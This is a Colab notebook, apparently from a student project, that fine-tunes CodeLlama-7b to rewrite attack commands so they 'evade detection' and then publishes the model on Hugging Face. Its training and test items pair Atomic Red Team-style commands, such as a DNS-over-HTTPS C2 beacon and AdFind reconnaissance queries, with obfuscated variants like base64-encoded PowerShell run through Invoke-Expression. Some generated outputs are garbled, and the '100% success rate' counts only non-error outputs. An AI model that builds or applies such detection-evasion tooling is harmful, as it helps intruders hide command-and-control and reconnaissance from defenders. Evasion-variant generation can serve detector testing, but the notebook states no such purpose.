# STEP 1: Install dependencies and login HF

In [None]:
!pip install transformers accelerate peft bitsandbytes datasets torch

Collecting bitsandbytes
  Downloading bitsandbytes-0.46.1-py3-none-manylinux_2_24_x86_64.whl.metadata (10 kB)
Collecting nvidia-cuda-nvrtc-cu12==12.4.127 (from torch)
  Downloading nvidia_cuda_nvrtc_cu12-12.4.127-py3-none-manylinux2014_x86_64.whl.metadata (1.5 kB)
Collecting nvidia-cuda-runtime-cu12==12.4.127 (from torch)
  Downloading nvidia_cuda_runtime_cu12-12.4.127-py3-none-manylinux2014_x86_64.whl.metadata (1.5 kB)
Collecting nvidia-cuda-cupti-cu12==12.4.127 (from torch)
  Downloading nvidia_cuda_cupti_cu12-12.4.127-py3-none-manylinux2014_x86_64.whl.metadata (1.6 kB)
Collecting nvidia-cudnn-cu12==9.1.0.70 (from torch)
  Downloading nvidia_cudnn_cu12-9.1.0.70-py3-none-manylinux2014_x86_64.whl.metadata (1.6 kB)
Collecting nvidia-cublas-cu12==12.4.5.8 (from torch)
  Downloading nvidia_cublas_cu12-12.4.5.8-py3-none-manylinux2014_x86_64.whl.metadata (1.5 kB)
Collecting nvidia-cufft-cu12==11.2.1.3 (from torch)
  Downloading nvidia_cufft_cu12-11.2.1.3-py3-none-manylinux2014_x86_64.whl.me

In [None]:
from huggingface_hub import notebook_login
notebook_login()

VBox(children=(HTML(value='<center> <img\nsrc=https://huggingface.co/front/assets/huggingface_logo-noborder.sv…

# STEP 2: Declare functions and start tuning

## Import libraries and dependencies

In [None]:
import torch
from datasets import load_dataset, Dataset
from peft import LoraConfig, get_peft_model, TaskType, PeftModel, prepare_model_for_kbit_training
from transformers import (
    AutoModelForCausalLM,
    AutoTokenizer,
    BitsAndBytesConfig,
    TrainingArguments,
    Trainer,
    DataCollatorForLanguageModeling
)
import os
import json
import random

## Declare functions

In [None]:
def load_jsonl_dataset(file_path):
    """Load JSONL file manually and create Dataset"""
    data = []
    with open(file_path, 'r', encoding='utf-8') as f:
        for line in f:
            if line.strip():  # Skip empty lines
                data.append(json.loads(line.strip()))
    return Dataset.from_list(data)

def format_training_data(examples):
    """Format data với consistent prompt format"""
    texts = []
    for i in range(len(examples["instruction"])):
        instruction = examples["instruction"][i]
        input_text = examples["input"][i] if examples["input"][i] else ""
        output_text = examples["output"][i]

        if input_text:
            text = f"### Instruction:\n{instruction}\n\n### Input:\n{input_text}\n\n### Response:\n{output_text}<|endoftext|>"
        else:
            text = f"### Instruction:\n{instruction}\n\n### Response:\n{output_text}<|endoftext|>"
        texts.append(text)
    return {"text": texts}

def tokenize_function(examples, tokenizer, max_length=512):
    """Tokenize với instruction masking để chỉ train trên response"""
    tokenized_inputs = []
    labels = []

    for text in examples["text"]:
        # Tokenize full text
        full_tokenized = tokenizer(
            text,
            truncation=True,
            padding=False,
            max_length=max_length,
            return_tensors=None,
        )

        response_start = text.find("### Response:\n") + len("### Response:\n")

        prefix_text = text[:response_start]
        prefix_tokenized = tokenizer(
            prefix_text,
            truncation=False,
            padding=False,
            return_tensors=None,
        )

        input_ids = full_tokenized["input_ids"]
        label_ids = input_ids.copy()

        prefix_length = len(prefix_tokenized["input_ids"])
        for i in range(min(prefix_length, len(label_ids))):
            label_ids[i] = -100

        tokenized_inputs.append(input_ids)
        labels.append(label_ids)

    return {
        "input_ids": tokenized_inputs,
        "attention_mask": [[1] * len(ids) for ids in tokenized_inputs],
        "labels": labels
    }

## Finetune function

In [None]:
def finetune_codellama():
    print("[+] Start fine-tuning CodeLLaMA...")

    # Clear GPU cache
    torch.cuda.empty_cache()
    import gc, json, random
    gc.collect()

    # 1. Load dataset - SPLIT TRAIN/TEST
    print("[-] Loading and splitting dataset...")

    original_path = "/content/finetune_bypass_output.jsonl"

    with open(original_path, "r", encoding="utf-8") as f:
        all_data = [json.loads(line) for line in f]

    random.seed(42)
    random.shuffle(all_data)

    # Split 70% train, 30% test
    split_idx = int(0.7 * len(all_data))
    train_data = all_data[:split_idx]
    test_data = all_data[split_idx:]

    # Write to file
    with open("/content/train_data.jsonl", "w", encoding="utf-8") as f:
        for d in train_data:
            f.write(json.dumps(d) + "\n")

    with open("/content/test_data.jsonl", "w", encoding="utf-8") as f:
        for d in test_data:
            f.write(json.dumps(d) + "\n")

    print(f"[+] Done splitting data: {len(train_data)} train / {len(test_data)} test")

    # Create dataset HuggingFace from JSON list
    data = Dataset.from_list(train_data)
    print(f"[+] Loaded {len(data)} training examples")

    # 2. Load tokenizer
    print("[-] Loading tokenizer...")
    tokenizer = AutoTokenizer.from_pretrained("codellama/CodeLlama-7b-hf")
    tokenizer.pad_token = tokenizer.eos_token
    tokenizer.padding_side = "right"

    # 3. Format dataset
    print("[-] Formatting dataset...")
    formatted_data = data.map(
        format_training_data,
        batched=True,
        remove_columns=data.column_names
    )

    # 4. Tokenize dataset
    print("[-] Tokenizing dataset...")
    tokenized_data = formatted_data.map(
        lambda x: tokenize_function(x, tokenizer),
        batched=True,
        remove_columns=formatted_data.column_names
    )

    # 5. Load model with quantization
    print("[-] Loading model...")
    bnb_config = BitsAndBytesConfig(
        load_in_4bit=True,
        bnb_4bit_quant_type="nf4",
        bnb_4bit_compute_dtype=torch.float16,
        bnb_4bit_use_double_quant=True,
    )

    model = AutoModelForCausalLM.from_pretrained(
        "codellama/CodeLlama-7b-hf",
        quantization_config=bnb_config,
        device_map="auto",
        trust_remote_code=True,
        torch_dtype=torch.float16,
    )

    # Prepare model for k-bit training
    model = prepare_model_for_kbit_training(model)
    model.config.use_cache = False
    model.config.pretraining_tp = 1
    model.gradient_checkpointing_enable()

    # Clear cache after loading
    torch.cuda.empty_cache()

    # 6. Setup LoRA
    print("[-] Setting up LoRA...")

    # Enable input embedding gradients for LoRA
    model.enable_input_require_grads()

    peft_config = LoraConfig(
        task_type=TaskType.CAUSAL_LM,
        inference_mode=False,
        r=16,
        lora_alpha=32,
        lora_dropout=0.1,
        target_modules=["q_proj", "v_proj", "k_proj", "o_proj"],
        bias="none",
    )

    model = get_peft_model(model, peft_config)

    # Verify trainable parameters
    model.print_trainable_parameters()

    # Additional check for gradient requirements
    trainable_params = sum(p.numel() for p in model.parameters() if p.requires_grad)
    if trainable_params == 0:
        print("[x] ERROR: No trainable parameters found!")
        return None
    else:
        print(f"[+] Found {trainable_params:,} trainable parameters")

    # 7. Setup training arguments - EXTREME MEMORY OPTIMIZATION
    print("[-] Setting up training...")
    training_args = TrainingArguments(
        output_dir="./codellama-custom-finetuned",
        per_device_train_batch_size=1,
        gradient_accumulation_steps=4,
        learning_rate=2e-4,
        num_train_epochs=3,
        max_steps=400,
        logging_steps=50,
        save_strategy="epoch",
        save_steps=500,
        save_total_limit=2,
        fp16=True,
        optim="paged_adamw_8bit",
        lr_scheduler_type="cosine",
        warmup_steps=100,
        group_by_length=True,
        dataloader_drop_last=True,
        report_to=None,
        push_to_hub=False,
        dataloader_num_workers=0,
        remove_unused_columns=False,
        eval_strategy="no",
        prediction_loss_only=True,
        dataloader_pin_memory=False,
        skip_memory_metrics=True,
    )

    # 8. Data collator - FIXED FOR CAUSAL LM
    data_collator = DataCollatorForLanguageModeling(
        tokenizer=tokenizer,
        mlm=False,
        pad_to_multiple_of=8,
        return_tensors="pt"
    )

    # 9. Trainer - WITH GRADIENT DEBUG
    trainer = Trainer(
        model=model,
        args=training_args,
        train_dataset=tokenized_data,
        data_collator=data_collator,
        tokenizer=tokenizer,
    )

    # 10. Train with memory monitoring
    print("[-] Starting training...")
    trainer.train()

    # 11. Save model
    print("[-] Saving model...")
    trainer.save_model()

    print("[+] Training completed!")
    return trainer

## Start training

In [None]:
trainer = finetune_codellama()

[+] Start fine-tuning CodeLLaMA...
[-] Loading and splitting dataset...
[+] Done splitting data: 4711 train / 2019 test
[+] Loaded 4711 training examples
[-] Loading tokenizer...


The secret `HF_TOKEN` does not exist in your Colab secrets.
To authenticate with the Hugging Face Hub, create a token in your settings tab (https://huggingface.co/settings/tokens), set it as secret in your Google Colab and restart your session.
You will be able to reuse this secret in all of your notebooks.
Please note that authentication is recommended but still optional to access public models or datasets.


[-] Formatting dataset...


Map:   0%|          | 0/4711 [00:00<?, ? examples/s]

[-] Tokenizing dataset...


Map:   0%|          | 0/4711 [00:00<?, ? examples/s]

[-] Loading model...


Loading checkpoint shards:   0%|          | 0/2 [00:00<?, ?it/s]

[-] Setting up LoRA...


  trainer = Trainer(
No label_names provided for model class `PeftModelForCausalLM`. Since `PeftModel` hides base models input arguments, if label_names is not given, label_names can't be set automatically within `Trainer`. Note that empty label_names list will be used instead.


trainable params: 16,777,216 || all params: 6,755,323,904 || trainable%: 0.2484
[+] Found 16,777,216 trainable parameters
[-] Setting up training...
[-] Starting training...


[34m[1mwandb[0m: Currently logged in as: [33mthuyvy-tranthi04[0m ([33mthuyvy-tranthi04-university-of-information-technology[0m) to [32mhttps://api.wandb.ai[0m. Use [1m`wandb login --relogin`[0m to force relogin


Step,Training Loss
50,1.4774
100,0.9174
150,0.7749
200,0.7908
250,0.7593
300,0.6738
350,0.7351
400,0.7167


[-] Saving model...
[+] Training completed!


# Additional: Steps to work with Google Drive

In [None]:
from google.colab import drive
drive.mount('/content/drive')

Mounted at /content/drive


## Create folder

In [None]:
import os
os.makedirs("/content/drive/MyDrive/finetune_lora", exist_ok=True)

## Uncomment and run this if you want to load model from your drive

In [None]:
# !cp -r /content/drive/MyDrive/finetune_lora/codellama-custom-finetuned /content/codellama-custom-finetuned
# !cp -r /content/drive/MyDrive/finetune_lora/merged_model_fp16 /content/merged_model_fp16

# STEP 3: Merge model and save to you drive

## Save pre-merged model to your drive

In [None]:
!cp -r /content/codellama-custom-finetuned /content/drive/MyDrive/finetune_lora/codellama-custom-finetuned
# Replace with your model's name #########################

## Merge and save merged model to drive

In [None]:
from transformers import AutoTokenizer, AutoModelForCausalLM
from peft import PeftModel
import torch

base_model_id = "codellama/CodeLlama-7b-hf"

# Replace with your model's name #####################################################
lora_model_path = "/content/drive/MyDrive/finetune_lora/codellama-custom-finetuned" ##
######################################################################################

merged_model_path = "/content/drive/MyDrive/finetune_lora/merged_model_fp16"

# Load base model
base_model = AutoModelForCausalLM.from_pretrained(
    base_model_id,
    device_map="auto",
    torch_dtype=torch.float16,
    trust_remote_code=True,
)

# Merge LoRA into base model
lora_model = PeftModel.from_pretrained(
    base_model,
    lora_model_path,
    torch_dtype=torch.float16,
)

merged_model = lora_model.merge_and_unload()
merged_model.save_pretrained(merged_model_path)

The secret `HF_TOKEN` does not exist in your Colab secrets.
To authenticate with the Hugging Face Hub, create a token in your settings tab (https://huggingface.co/settings/tokens), set it as secret in your Google Colab and restart your session.
You will be able to reuse this secret in all of your notebooks.
Please note that authentication is recommended but still optional to access public models or datasets.


Loading checkpoint shards:   0%|          | 0/2 [00:00<?, ?it/s]

# Test finetuned model

## Download dependencies
### Only if you load model from your drive, uncomment this

In [None]:
#!pip install transformers accelerate bitsandbytes peft



## Load model and create pipeline

In [None]:
from transformers import AutoTokenizer, AutoModelForCausalLM, pipeline
import torch

model_path = "/content/drive/MyDrive/finetune_lora/merged_model_fp16"

# Load tokenizer từ base model
tokenizer = AutoTokenizer.from_pretrained("codellama/CodeLlama-7b-hf")
tokenizer.pad_token = tokenizer.eos_token
tokenizer.padding_side = "right"

# Save vào merged model path
merged_model_path = "/content/drive/MyDrive/finetune_lora/merged_model_fp16"
tokenizer.save_pretrained(merged_model_path)

# Load model
model = AutoModelForCausalLM.from_pretrained(model_path, device_map="auto", torch_dtype=torch.float16, trust_remote_code=True)

The secret `HF_TOKEN` does not exist in your Colab secrets.
To authenticate with the Hugging Face Hub, create a token in your settings tab (https://huggingface.co/settings/tokens), set it as secret in your Google Colab and restart your session.
You will be able to reuse this secret in all of your notebooks.
Please note that authentication is recommended but still optional to access public models or datasets.


Loading checkpoint shards:   0%|          | 0/3 [00:00<?, ?it/s]

## Test model on test set

In [None]:
# 1. Load dataset - SPLIT TRAIN/TEST
print("[-] Loading and splitting dataset...")

original_path = "/content/finetune_bypass_output.jsonl"

with open(original_path, "r", encoding="utf-8") as f:
    all_data = [json.loads(line) for line in f]

random.seed(42)
random.shuffle(all_data)

# Split 70% train, 30% test
split_idx = int(0.7 * len(all_data))
train_data = all_data[:split_idx]
test_data = all_data[split_idx:]

# Write to file
with open("/content/train_data.jsonl", "w", encoding="utf-8") as f:
    for d in train_data:
        f.write(json.dumps(d) + "\n")

with open("/content/test_data.jsonl", "w", encoding="utf-8") as f:
    for d in test_data:
        f.write(json.dumps(d) + "\n")

[-] Loading and splitting dataset...


In [None]:
from tqdm import tqdm
import json

# Load test set
with open("/content/test_data.jsonl", "r", encoding="utf-8") as f:
    test_data = [json.loads(line) for line in f]

def build_prompt(command: str) -> str:
    return f"""### Instruction:
Modify the following attack command to evade detection.

### Input:
{command}

### Response:
"""

def extract_response_only(full_output: str, original_prompt: str) -> str:
    """Trích xuất chỉ phần response, loại bỏ prompt"""
    try:
        response_marker = "### Response:"
        if response_marker in full_output:
            response_part = full_output.split(response_marker, 1)[1]

            response_part = response_part.strip()

            response_part = response_part.replace("<|endoftext|>", "")
            response_part = response_part.replace("</s>", "")

            lines = response_part.split('\n')
            clean_lines = []
            for line in lines:
                line = line.strip()
                if line and not line.startswith('###'):
                    clean_lines.append(line)
                elif line.startswith('###'):
                    break

            return '\n'.join(clean_lines).strip()
        else:
            return full_output.strip()

    except Exception as e:
        return f"[PARSING_ERROR] {str(e)}"

def generate_response(command: str, max_retries: int = 3) -> str:
    prompt = build_prompt(command)

    for attempt in range(max_retries):
        try:
            inputs = tokenizer(prompt, return_tensors="pt").to(model.device)

            with torch.no_grad():
                outputs = model.generate(
                    **inputs,
                    max_new_tokens=100,
                    min_new_tokens=5,
                    do_sample=True,
                    temperature=0.7,
                    top_p=0.9,
                    top_k=50,
                    repetition_penalty=1.15,
                    pad_token_id=tokenizer.eos_token_id,
                    eos_token_id=tokenizer.eos_token_id,
                    early_stopping=True,
                    num_return_sequences=1,
                )

            full_output = tokenizer.decode(outputs[0], skip_special_tokens=True)

            response = extract_response_only(full_output, prompt)

            if response and len(response.strip()) > 0 and "[ERROR]" not in response:
                return response

        except Exception as e:
            if attempt == max_retries - 1:
                return f"[GENERATION_ERROR] {str(e)}"
            continue

    return "[GENERATION_FAILED] Max retries exceeded"

print("\n[-] Testing with some examples...")
sample_tests = test_data[:3]
for i, example in enumerate(sample_tests):
    command = example["input"]
    expected = example["output"]

    print(f"\n--- Test {i+1} ---")
    print(f"Input: {command}")
    print(f"Expected: {expected}")

    generated = generate_response(command)
    print(f"Generated: {generated}")
    print("-" * 50)

user_input = input("\n[-] Continue to full test? (y/n): ")

if user_input.lower() in ['y', 'yes']:
    print("\n[-] Starting full test...")

    results = []
    failed_count = 0

    for example in tqdm(test_data, desc="[-] Testing on full test set"):
        command = example["input"]
        expected = example["output"]

        try:
            generated = generate_response(command)

            if "[ERROR]" in generated or "[GENERATION" in generated:
                failed_count += 1

            results.append({
                "input": command,
                "output_expected": expected,
                "output_model": generated
            })

        except Exception as e:
            failed_count += 1
            results.append({
                "input": command,
                "output_expected": expected,
                "output_model": f"[CRITICAL_ERROR] {str(e)}"
            })

    # Save results
    output_file = "/content/model_test_results.jsonl"
    with open(output_file, "w", encoding="utf-8") as f:
        for r in results:
            f.write(json.dumps(r, ensure_ascii=False) + "\n")

    print(f"\n[+] Testing completed!")
    print(f"[-] Results: {len(results)} total, {failed_count} failed")
    print(f"[-] Results saved to: {output_file}")

    success_rate = (len(results) - failed_count) / len(results) * 100
    print(f"[+] Success rate: {success_rate:.1f}%")

    print("\n[+] Some good examples:")
    good_examples = [r for r in results if "[ERROR]" not in r["output_model"] and "[GENERATION" not in r["output_model"]][:5]

    for i, example in enumerate(good_examples):
        print(f"\n{i+1}. Input: {example['input']}")
        print(f"   Expected: {example['output_expected']}")
        print(f"   Generated: {example['output_model']}")

else:
    print("[+] Test stopped. Please review the sample results and adjust parameters if needed.")

The following generation flags are not valid and may be ignored: ['early_stopping']. Set `TRANSFORMERS_VERBOSITY=info` for more details.



[-] Testing with some examples...

--- Test 1 ---
Input: Set-Location "PathToAtomicsFolder"
.\T1572\src\T1572-doh-beacon.ps1 -DohServer #{doh_server} -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}

Expected: powershell.exe -NoProfile -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U2V0LUxvY2F0aW9uICJQYXRoVG9BdG9taWNzRm9sZGVyIgouXFQxNTcyXHNyY1xUMTU3Mi1kb2gtYmVhY29uLnBzMSAtRG9oU2VydmVyICN7ZG9oX3NlcnZlcn0gLURvbWFpbiAje2RvbWFpbn0gLVN1YmRvbWFpbiAje3N1YmRvbWFpbn0gLVF1ZXJ5VHlwZSAje3F1ZXJ5X3R5cGV9IC1DMkludGVydmFsICN7YzJfaW50ZXJ2YWx9IC1DMkppdHRlciAje2MyX2ppdHRlcn0gLVJ1blRpbWUgI3tydW50aW1lfQ==')) | Invoke-Expression"


The following generation flags are not valid and may be ignored: ['early_stopping']. Set `TRANSFORMERS_VERBOSITY=info` for more details.


Generated: Set-Location PathToAtomicsFolder .\T1572\src\T1572-doh-beacon.ps1 -DohServer ""-Domain ""-Subdomain ""-QueryType "<|endoftext|
--------------------------------------------------

--- Test 2 ---
Input: "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties

Expected: "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"


The following generation flags are not valid and may be ignored: ['early_stopping']. Set `TRANSFORMERS_VERBOSITY=info` for more details.


Generated: powershell.exe -NoProfile -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHByb2Nlc3MgLW1hYy9kZXRhaXIgImFwcC50bGQiIHRhdGEgIlxBdWRpdCBkaXNjb3VudC5maWxlfSIsICJsYWtlU3
--------------------------------------------------

--- Test 3 ---
Input: "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=group) #{optional_args}

Expected: PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe -f (objectcategory=group)
Generated: "PathToAtomicsFolder..ExternalPayloadsAdFind.exe" -f (objectcategory=group)   ""-f (objectcategory=group)\"P\",\"a\",\"t\",\"h\",\"T\",\"o\",\"Ato",m,ic
--------------------------------------------------

[-] Continue to full test? (y/n): y

[-] Starting full test...


[-] Testing on full test set:   0%|          | 0/2019 [00:00<?, ?it/s]The following generation flags are not valid and may be ignored: ['early_stopping']. Set `TRANSFORMERS_VERBOSITY=info` for more details.
[-] Testing on full test set:   0%|          | 1/2019 [00:06<3:27:01,  6.16s/it]The following generation flags are not valid and may be ignored: ['early_stopping']. Set `TRANSFORMERS_VERBOSITY=info` for more details.
[-] Testing on full test set:   0%|          | 2/2019 [00:12<3:27:34,  6.17s/it]The following generation flags are not valid and may be ignored: ['early_stopping']. Set `TRANSFORMERS_VERBOSITY=info` for more details.
[-] Testing on full test set:   0%|          | 3/2019 [00:18<3:26:56,  6.16s/it]The following generation flags are not valid and may be ignored: ['early_stopping']. Set `TRANSFORMERS_VERBOSITY=info` for more details.
[-] Testing on full test set:   0%|          | 4/2019 [00:24<3:26:34,  6.15s/it]The following generation flags are not valid and may be ignore


[+] Testing completed!
[-] Results: 2019 total, 0 failed
[-] Results saved to: /content/model_test_results.jsonl
[+] Success rate: 100.0%

[+] Some good examples:

1. Input: Set-Location "PathToAtomicsFolder"
.\T1572\src\T1572-doh-beacon.ps1 -DohServer #{doh_server} -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}

   Expected: powershell.exe -NoProfile -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U2V0LUxvY2F0aW9uICJQYXRoVG9BdG9taWNzRm9sZGVyIgouXFQxNTcyXHNyY1xUMTU3Mi1kb2gtYmVhY29uLnBzMSAtRG9oU2VydmVyICN7ZG9oX3NlcnZlcn0gLURvbWFpbiAje2RvbWFpbn0gLVN1YmRvbWFpbiAje3N1YmRvbWFpbn0gLVF1ZXJ5VHlwZSAje3F1ZXJ5X3R5cGV9IC1DMkludGVydmFsICN7YzJfaW50ZXJ2YWx9IC1DMkppdHRlciAje2MyX2ppdHRlcn0gLVJ1blRpbWUgI3tydW50aW1lfQ==')) | Invoke-Expression"
   Generated: Set-Location PathToAtomicsFolder .\T1572\src\T1572-doh-beacon.ps1 -DohServer -Domain -Subdomain -QueryType -C2Interval -C2Jitter -Runtime




# Upload model gguf to HF

## Download dependencies

In [None]:
!pip install llama-cpp-python
!pip install huggingface_hub
!git clone https://github.com/ggerganov/llama.cpp.git

Collecting llama-cpp-python
  Downloading llama_cpp_python-0.3.9.tar.gz (67.9 MB)
[2K     [90m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m [32m67.9/67.9 MB[0m [31m9.9 MB/s[0m eta [36m0:00:00[0m
[?25h  Installing build dependencies ... [?25l[?25hdone
  Getting requirements to build wheel ... [?25l[?25hdone
  Installing backend dependencies ... [?25l[?25hdone
  Preparing metadata (pyproject.toml) ... [?25l[?25hdone
Collecting diskcache>=5.6.1 (from llama-cpp-python)
  Downloading diskcache-5.6.3-py3-none-any.whl.metadata (20 kB)
Downloading diskcache-5.6.3-py3-none-any.whl (45 kB)
[2K   [90m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m [32m45.5/45.5 kB[0m [31m3.5 MB/s[0m eta [36m0:00:00[0m
[?25hBuilding wheels for collected packages: llama-cpp-python
  Building wheel for llama-cpp-python (pyproject.toml) ... [?25l[?25hdone
  Created wheel for llama-cpp-python: filename=llama_cpp_python-0.3.9-cp311-cp311-linux_x86_64.whl size=4067750 sha256=cadc4a447a8ede5a5594e

## Build llama.cpp

In [None]:
!cd llama.cpp && mkdir build
!cd llama.cpp/build && cmake .. && make -j$(nproc)

-- The C compiler identification is GNU 11.4.0
-- The CXX compiler identification is GNU 11.4.0
-- Detecting C compiler ABI info
-- Detecting C compiler ABI info - done
-- Check for working C compiler: /usr/bin/cc - skipped
-- Detecting C compile features
-- Detecting C compile features - done
-- Detecting CXX compiler ABI info
-- Detecting CXX compiler ABI info - done
-- Check for working CXX compiler: /usr/bin/c++ - skipped
-- Detecting CXX compile features
-- Detecting CXX compile features - done
-- Found Git: /usr/bin/git (found version "2.34.1")
-- Performing Test CMAKE_HAVE_LIBC_PTHREAD
-- Performing Test CMAKE_HAVE_LIBC_PTHREAD - Success
-- Found Threads: TRUE
-- CMAKE_SYSTEM_PROCESSOR: x86_64
-- GGML_SYSTEM_ARCH: x86
-- Including CPU backend
-- Found OpenMP_C: -fopenmp (found version "4.5")
-- Found OpenMP_CXX: -fopenmp (found version "4.5")
-- Found OpenMP: TRUE (found version "4.5")
-- x86 detected
-- Adding CPU backend variant ggml-cpu: -march=native 
-- Found CURL: /usr/lib

## Declare function to convert and upload file to gguf

In [None]:
from transformers import AutoTokenizer
from huggingface_hub import HfApi, create_repo
import subprocess
import os

merged_model_path = "/content/merged_model_fp16"
base_model_id = "codellama/CodeLlama-7b-hf"

print("Saving tokenizer...")
tokenizer = AutoTokenizer.from_pretrained(base_model_id)
tokenizer.save_pretrained(merged_model_path)

print("Converting to GGUF format...")
gguf_output_path = "/content/merged_model.gguf"

convert_script = "/content/llama.cpp/convert_hf_to_gguf.py"
convert_command = [
    "python", convert_script,
    merged_model_path,
    "--outfile", gguf_output_path,
    "--outtype", "f16"
]

try:
    result = subprocess.run(convert_command, capture_output=True, text=True, check=True)
    print("Conversion successful!")
    print(result.stdout)
except subprocess.CalledProcessError as e:
    print(f"Conversion failed: {e}")
    print(f"Error output: {e.stderr}")

def upload_to_huggingface(gguf_file_path, repo_name, hf_token):
    api = HfApi(token=hf_token)

    try:
        create_repo(repo_name, token=hf_token, exist_ok=True)
        print(f"Repository {repo_name} created/confirmed")
    except Exception as e:
        print(f"Error creating repo: {e}")
        return

    try:
        api.upload_file(
            path_or_fileobj=gguf_file_path,
            path_in_repo="model.gguf",
            repo_id=repo_name,
            token=hf_token
        )
        print(f"Successfully uploaded to https://huggingface.co/{repo_name}")
    except Exception as e:
        print(f"Upload failed: {e}")

Saving tokenizer...


The secret `HF_TOKEN` does not exist in your Colab secrets.
To authenticate with the Hugging Face Hub, create a token in your settings tab (https://huggingface.co/settings/tokens), set it as secret in your Google Colab and restart your session.
You will be able to reuse this secret in all of your notebooks.
Please note that authentication is recommended but still optional to access public models or datasets.


tokenizer_config.json:   0%|          | 0.00/749 [00:00<?, ?B/s]

tokenizer.model:   0%|          | 0.00/500k [00:00<?, ?B/s]

tokenizer.json:   0%|          | 0.00/1.84M [00:00<?, ?B/s]

special_tokens_map.json:   0%|          | 0.00/411 [00:00<?, ?B/s]

Converting to GGUF format...
Conversion successful!



## Run code

In [None]:
if __name__ == "__main__":
    HF_TOKEN = "yourtoken"

    # Change to your data repo's name. ###########
    # Example: hira-wz/codellama-custom-rules-gguf
    REPO_NAME = "hira-wz/codellama-custom-gguf" ##
    ##############################################

    # Upload GGUF file
    if os.path.exists(gguf_output_path):
        upload_to_huggingface(gguf_output_path, REPO_NAME, HF_TOKEN)
    else:
        print("GGUF file not found. Please check the conversion step.")

Repository hira-wz/codellama-custom-gguf created/confirmed


merged_model.gguf:   0%|          | 0.00/13.5G [00:00<?, ?B/s]

Successfully uploaded to https://huggingface.co/hira-wz/codellama-custom-gguf
